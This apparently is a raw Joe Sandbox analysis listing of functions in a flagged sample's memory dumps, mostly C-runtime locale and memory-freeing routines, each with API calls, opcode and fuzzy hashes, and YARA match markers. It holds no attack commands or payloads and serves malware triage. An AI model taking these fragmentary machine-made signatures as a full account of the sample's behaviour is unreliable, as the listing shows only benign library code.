                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                  • String ID: =CA
                                                                                                                                                                                                                                  • API String ID: 1084509184-159236625
                                                                                                                                                                                                                                  • Opcode ID: a96536e0df95889afedebea6b283c6d928245b59909cdca84085bef51b7701ed
                                                                                                                                                                                                                                  • Instruction ID: 2495996395a678c0b0b6d2c4eccef08732c43701ffe65dee0c881fbc629916fd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a96536e0df95889afedebea6b283c6d928245b59909cdca84085bef51b7701ed
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 85F0C8363003145FD7246F79AC9167A7BD5EF8035CB55842EFA458B641D6B59C428A04
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004174E4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00413D9B,?,00000004), ref: 00417537
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                  • String ID: GetLocaleInfoEx
                                                                                                                                                                                                                                  • API String ID: 2299586839-2904428671
                                                                                                                                                                                                                                  • Opcode ID: a1e251d402f626eafc57a2dc60530b21e3b199b9edc33d4a7c03029131258f5a
                                                                                                                                                                                                                                  • Instruction ID: 6b67f736e2e63cc60f408e8e0dfee7a9fd2cac623ca874a3f295f3da83e4a478
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a1e251d402f626eafc57a2dc60530b21e3b199b9edc33d4a7c03029131258f5a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88F0F631740218B7DB11AF61AC01FAE3B71DF48711F90005BFC0527292CE355E509A9D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0042069E Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004206F2
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1663032902-0
                                                                                                                                                                                                                                  • Opcode ID: 278f7c6b2aa14afe0c6ed7e33fdae189d7f781ecdcb946987dcb3aded81e7d59
                                                                                                                                                                                                                                  • Instruction ID: 9cee96005927a1573ed79b1b6da19a4e5e72af736dd4be10e0bf17a0e1069c17
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 278f7c6b2aa14afe0c6ed7e33fdae189d7f781ecdcb946987dcb3aded81e7d59
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7421A472610226ABDB249A25EC41BBB77E8EB80314F50017FFD05D6242EB79ED44CB59
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004208CE Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0042066C,00000000,00000000,?), ref: 004208FA
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2692324296-0
                                                                                                                                                                                                                                  • Opcode ID: f66ba7bb0cfe7a128ca09bcf12df20b278ba408f6d73fccf536a7c8f3da60bd0
                                                                                                                                                                                                                                  • Instruction ID: 95b118f29787940bb019709f183f2c3e5714f1a92d3f33ac24e0601bbd6709b7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f66ba7bb0cfe7a128ca09bcf12df20b278ba408f6d73fccf536a7c8f3da60bd0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03F04E727001257FEB245B1598057BB77A8DB40314F51442AEC47A3242DA38BD81C5D4
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004170F1 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00411A06: EnterCriticalSection.KERNEL32(?,?,00416AB9,?,004395B8,00000008,00416B87,?,?,?), ref: 00411A15
                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(004170AB,00000001,00439638,0000000C), ref: 00417129
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1272433827-0
                                                                                                                                                                                                                                  • Opcode ID: 7948fd84ff868524a75aefca5004dce8ea0bd2aca87ab7f0ff4530e5da38c521
                                                                                                                                                                                                                                  • Instruction ID: 132fde00c3026ba385e258918c38b9eec635062562826c8cbc0ed6069a56d62f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7948fd84ff868524a75aefca5004dce8ea0bd2aca87ab7f0ff4530e5da38c521
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2F03131A503009FD714EF69D846B9D37F0EB04714F10512BF514EB2E1CB7849408B49
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004202DB Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(00420232,00000001,?,?,?,00420A9D,=CA,?,?,?,?,?,0041433D,?,?,?), ref: 00420312
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1084509184-0
                                                                                                                                                                                                                                  • Opcode ID: 1ba4f1af0ec470da337eca2a097a8a08ef9fea41670d800165add5fa0530a193
                                                                                                                                                                                                                                  • Instruction ID: c54caae612f79c45943fa80a9590922199881531d53ba21540ab7825707139eb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1ba4f1af0ec470da337eca2a097a8a08ef9fea41670d800165add5fa0530a193
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FEF0273530021497CB149B35E80966ABF90EB81714B86405EEE058B242C6759C43CB54
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00420C1A Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: HeapProcess
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 54951025-0
                                                                                                                                                                                                                                  • Opcode ID: e8ed93b8e17730d585274d76292deac119e5b071f80d085d6d237c3884551339
                                                                                                                                                                                                                                  • Instruction ID: d0f1a20189e36393daad9c8fb7d6be9c176ac9989c87cef9d6c19eed9d752231
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e8ed93b8e17730d585274d76292deac119e5b071f80d085d6d237c3884551339
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09A012306011008B63104F305D8460C3A94594459034500386004C0020DE304094D708
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 040CC5B3 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2259248364.00000000040CC000.00000040.00000020.00020000.00000000.sdmp, Offset: 040CC000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_40cc000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                  • Instruction ID: 391d770a71b87e044a5fda50daec76cc4896d9791836348fdfd4423cdff5bec7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 41118272344100DFE744DF65DC84EAA73EAEB89324B198059ED08DB312E675F841C760
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05BD0D90 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2279821604.0000000005BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_5bd0000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                  • Instruction ID: c43ecb694a6987b685b370c6bc105688744cf5c35a50e9af01831c872ca9259b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5101A776A016089FDF21DF24C809FBAB3F5FB85215F4544F9D90A97242F774B9418BA0
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00411F6A Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$Info
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2509303402-0
                                                                                                                                                                                                                                  • Opcode ID: 9ba8043ac8ff267f0ce42ea0bddbd3aca1e886c3a33d2db2d31a05c5540ee44f
                                                                                                                                                                                                                                  • Instruction ID: f64e8217d5a59399788f44db3acace11ca7a1a82a17f4f1e7e4f503dd26c9166
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ba8043ac8ff267f0ce42ea0bddbd3aca1e886c3a33d2db2d31a05c5540ee44f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68B1CF71900305AFDB20DFA5C881BEEBBF5BF48304F14416EF959E7242D7B9A8918B64
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041F651 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ___free_lconv_mon.LIBCMT ref: 0041F695
                                                                                                                                                                                                                                    • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA01
                                                                                                                                                                                                                                    • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA13
                                                                                                                                                                                                                                    • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA25
                                                                                                                                                                                                                                    • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA37
                                                                                                                                                                                                                                    • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA49
                                                                                                                                                                                                                                    • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA5B
                                                                                                                                                                                                                                    • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA6D
                                                                                                                                                                                                                                    • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA7F
                                                                                                                                                                                                                                    • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA91
                                                                                                                                                                                                                                    • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EAA3
                                                                                                                                                                                                                                    • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EAB5
                                                                                                                                                                                                                                    • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EAC7
                                                                                                                                                                                                                                    • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EAD9
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F68A
                                                                                                                                                                                                                                    • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?), ref: 004162B0
                                                                                                                                                                                                                                    • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?,?), ref: 004162C2
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F6AC
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F6C1
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F6CC
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F6EE
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F701
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F70F
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F71A
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F752
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F759
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F776
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F78E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 161543041-0
                                                                                                                                                                                                                                  • Opcode ID: 4378ab1e63d5d9fa38ce44ce9ca5439023feb45242475f2f3e48cd459ec3a37b
                                                                                                                                                                                                                                  • Instruction ID: c0d36dfa6e7f1bd62f92c80ef49453a98ce7ec3addb1216f5c788df5de5df6c1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4378ab1e63d5d9fa38ce44ce9ca5439023feb45242475f2f3e48cd459ec3a37b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68314A316007049FEB20AA3AE845BD773E8FB44318F15446FE859D72A1DB38FCC68A18
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041EAE2 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                  • Opcode ID: d1f1aa2d03a28af46cbd75311468763efbf7631b30b7f566802b3458c1c144c6
                                                                                                                                                                                                                                  • Instruction ID: 07e65b0fe858109c33bb0f60f82280ccd5dee523497fe62cc235ec4013c6f493
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d1f1aa2d03a28af46cbd75311468763efbf7631b30b7f566802b3458c1c144c6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9EC15575E40304ABDB20DBA9CC46FDE77F8EB48704F14416AFE05EB282D674AD818798
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00423356 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 154COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0042435F), ref: 00423379
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DecodePointer
                                                                                                                                                                                                                                  • String ID: _CB$acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                                                                                                  • API String ID: 3527080286-940912563
                                                                                                                                                                                                                                  • Opcode ID: 9d3f8b26fe42f63356626bb489b4f8eb5208b9729511c62bda581acb0adce4f8
                                                                                                                                                                                                                                  • Instruction ID: 5368ad48e2641d38b699083c4314cf7ba7867baba3e9f2aa5664b85b9913fc9a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9d3f8b26fe42f63356626bb489b4f8eb5208b9729511c62bda581acb0adce4f8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 52518970A00229DBCF10DFA9F9481ADBBB0FB09305FE4419BE481A6254CB7D9B65CB1D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00416C25 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00416C39
                                                                                                                                                                                                                                    • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?), ref: 004162B0
                                                                                                                                                                                                                                    • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?,?), ref: 004162C2
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00416C45
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00416C50
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00416C5B
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00416C66
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00416C71
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00416C7C
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00416C87
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00416C92
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00416CA0
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: 8f320bdab7b5661ed1c853ef06dc04aedb299049eced393b2d7ed1c319db58c9
                                                                                                                                                                                                                                  • Instruction ID: 425b14d8582b8484cae793816d5f4fa8e3af98928aded5048720e3a5ca7bcabf
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f320bdab7b5661ed1c853ef06dc04aedb299049eced393b2d7ed1c319db58c9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B311E976100218BFDF01FF95D952DD93B65EF48358B4280AAFD088F222DA35EE919B84
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004011B0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 105COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004011B5
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 004011C7
                                                                                                                                                                                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00401204
                                                                                                                                                                                                                                    • Part of subcall function 00407E7A: _Yarn.LIBCPMT ref: 00407E99
                                                                                                                                                                                                                                    • Part of subcall function 00407E7A: _Yarn.LIBCPMT ref: 00407EBD
                                                                                                                                                                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 00401225
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00401233
                                                                                                                                                                                                                                  • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00401256
                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 004012C7
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::_$Locinfo::_LockitYarn$Exception@8H_prologLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_Throwstd::bad_exception::bad_exception
                                                                                                                                                                                                                                  • String ID: bad locale name
